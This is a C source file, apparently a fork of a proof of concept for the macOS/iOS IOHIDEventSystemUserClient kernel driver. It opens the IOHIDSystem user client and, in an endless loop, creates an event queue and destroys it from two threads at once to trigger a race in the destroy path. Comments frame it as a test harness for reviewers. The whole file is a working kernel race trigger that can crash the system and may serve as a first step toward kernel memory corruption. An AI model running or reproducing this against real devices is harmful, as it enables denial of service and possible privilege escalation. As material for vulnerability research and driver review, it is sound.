forked from iMokhles/IOHIDEventSystemUserClient
IOHIDEventSystemUserClient.c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <IOKit/IOKitLib.h>
#include <pthread.h>
/* Connection to the user client. main() fills it in via IOServiceOpen();
 * it is file-scope so that race(), which only receives a queue ID, can
 * issue calls on the same connection from the second thread. */
io_connect_t conn = MACH_PORT_NULL;
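/**
 * Ask the user client to create an event queue and return its ID.
 *
 * Issues external method selector 0 on `conn` with two scalar inputs (0 and
 * 32) and room for one scalar output. The failure message names the call
 * "createEventQueue". NOTE(review): the meaning of the two input scalars is
 * not visible in this file -- confirm against the driver's method table.
 *
 * @param conn  open user-client connection obtained from IOServiceOpen().
 * @return the first output scalar truncated to 32 bits, or 0 if the call
 *         fails or yields no output scalar. NOTE(review): 0 is an in-band
 *         value; a caller cannot tell it apart from a genuine ID of 0.
 */
uint32_t callCreate(io_connect_t conn) {
    uint64_t inputScalar[16] = { 0, 32 };
    uint32_t inputScalarCnt = 2;

    /* The struct buffers are passed with zero lengths, so no struct data is
     * exchanged in either direction. */
    char inputStruct[4096];
    size_t inputStructCnt = 0;
    char outputStruct[4096];
    size_t outputStructCnt = 0;

    /* Zero-initialised so that a failed call can never leak an
     * indeterminate stack value into the returned queue ID. */
    uint64_t outputScalar[16] = { 0 };
    uint32_t outputScalarCnt = 1;

    kern_return_t err = IOConnectCallMethod(
        conn,
        0,
        inputScalar,
        inputScalarCnt,
        inputStruct,
        inputStructCnt,
        outputScalar,
        &outputScalarCnt,
        outputStruct,
        &outputStructCnt);

    if (err != KERN_SUCCESS) {
        printf("unable to createEventQueue 0x%x\n", err);
        return 0;
    }

    /* The count is in/out: only trust outputScalar[0] if the driver
     * reported that it actually wrote one. */
    if (outputScalarCnt < 1) {
        return 0;
    }

    /* The function's contract is a 32-bit ID; make the narrowing explicit. */
    return (uint32_t)outputScalar[0];
}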
/**
 * Ask the user client to destroy the event queue identified by `queueID`.
 *
 * Issues external method selector 1 on `conn` with two scalar inputs (a
 * constant 0 and the queue ID) and no outputs. The failure message names the
 * call "destroyEventQueue". A failure is reported on stdout and otherwise
 * ignored; nothing is returned to the caller.
 *
 * @param conn     open user-client connection.
 * @param queueID  ID previously returned by callCreate().
 */
void callDestroy(io_connect_t conn, uint32_t queueID) {
    /* Only the first two slots are sent (count is 2). */
    uint64_t scalars_in[16] = { 0, queueID };
    const uint32_t scalars_in_count = 2;

    /* No scalar output is requested from this selector. */
    uint64_t scalars_out[16];
    uint32_t scalars_out_count = 0;

    /* Struct buffers are supplied but both lengths are zero. */
    char struct_in[4096];
    char struct_out[4096];
    size_t struct_out_len = 0;

    kern_return_t status = IOConnectCallMethod(conn,
                                               1,
                                               scalars_in,
                                               scalars_in_count,
                                               struct_in,
                                               0,
                                               scalars_out,
                                               &scalars_out_count,
                                               struct_out,
                                               &struct_out_len);
    if (status == KERN_SUCCESS) {
        return;
    }
    printf("unable to destroyEventQueue 0x%x\n", status);
}
/*
 * Destroy `queueID` on the file-scope connection `conn`.
 *
 * main() runs this on a second thread while it issues its own callDestroy()
 * for the same ID, so the driver sees two destroy requests for one queue at
 * roughly the same time.
 */
void race(uint32_t queueID)
{
    callDestroy(conn, queueID);
}
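/*
 * Start routine with the exact signature pthread_create() requires.
 * Calling race() through a cast function pointer of a different type is
 * undefined behaviour, so the queue ID is unpacked here and race() is
 * called with its real signature.
 */
static void *race_thread_entry(void *arg)
{
    race((uint32_t)(uintptr_t)arg);
    return NULL;
}

/*
 * Test harness for concurrent destruction of an event queue.
 *
 * Looks up the "IOHIDSystem" service, opens user client type 3 on it
 * (NOTE(review): presumably the IOHIDEventSystemUserClient named by this
 * file -- confirm against the service's newUserClient), then loops:
 * create a queue, destroy it from a second thread and from this thread at
 * the same time, join, repeat. The loop has no success exit; it ends only
 * if a thread cannot be started.
 *
 * For a reviewer of the driver: both destroy calls carry the same queue ID,
 * so a correct implementation has to let one of them win and fail the other
 * cleanly. A kernel fault while this loop runs would indicate that the
 * destroy path is not serialised against itself.
 *
 * Returns EXIT_FAILURE on any setup or thread-creation error.
 */
int main(int argc, char const *argv[])
{
    (void)argc;
    (void)argv;

    kern_return_t err;

    CFMutableDictionaryRef matching = IOServiceMatching("IOHIDSystem");
    if (!matching) {
        printf("unable to create service matching dictionary\n");
        return EXIT_FAILURE;
    }

    /* IOServiceGetMatchingServices() consumes the reference on `matching`,
     * so it is not released here. */
    io_iterator_t iterator = IO_OBJECT_NULL;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS) {
        printf("no matches\n");
        return EXIT_FAILURE;
    }

    /* Only the first match is used; the iterator is not needed afterwards. */
    io_service_t service = IOIteratorNext(iterator);
    IOObjectRelease(iterator);
    if (service == IO_OBJECT_NULL) {
        printf("unable to find service\n");
        return EXIT_FAILURE;
    }
    printf("got service: %x\n", service);

    err = IOServiceOpen(service, mach_task_self(), 3, &conn);
    /* The connection keeps what it needs; drop our service reference on
     * both the success and the failure path. */
    IOObjectRelease(service);
    if (err != KERN_SUCCESS) {
        printf("unable to get user client connection\n");
        return EXIT_FAILURE;
    }
    printf("got userclient connection: %x\n", conn);

    for (;;) {
        uint32_t queueID = callCreate(conn);

        /* Round-trip the 32-bit ID through uintptr_t so the integer to
         * pointer conversion is well defined on 64-bit targets. */
        pthread_t t;
        int rc = pthread_create(&t, NULL, race_thread_entry,
                                (void *)(uintptr_t)queueID);

        /* Destroy on this thread regardless, so the queue is not leaked
         * when the second thread could not be started. */
        callDestroy(conn, queueID);

        if (rc != 0) {
            /* `t` is indeterminate after a failed create; joining it
             * would be undefined behaviour. */
            printf("unable to create thread: %d\n", rc);
            break;
        }
        pthread_join(t, NULL);
    }

    IOServiceClose(conn);
    return EXIT_FAILURE;
}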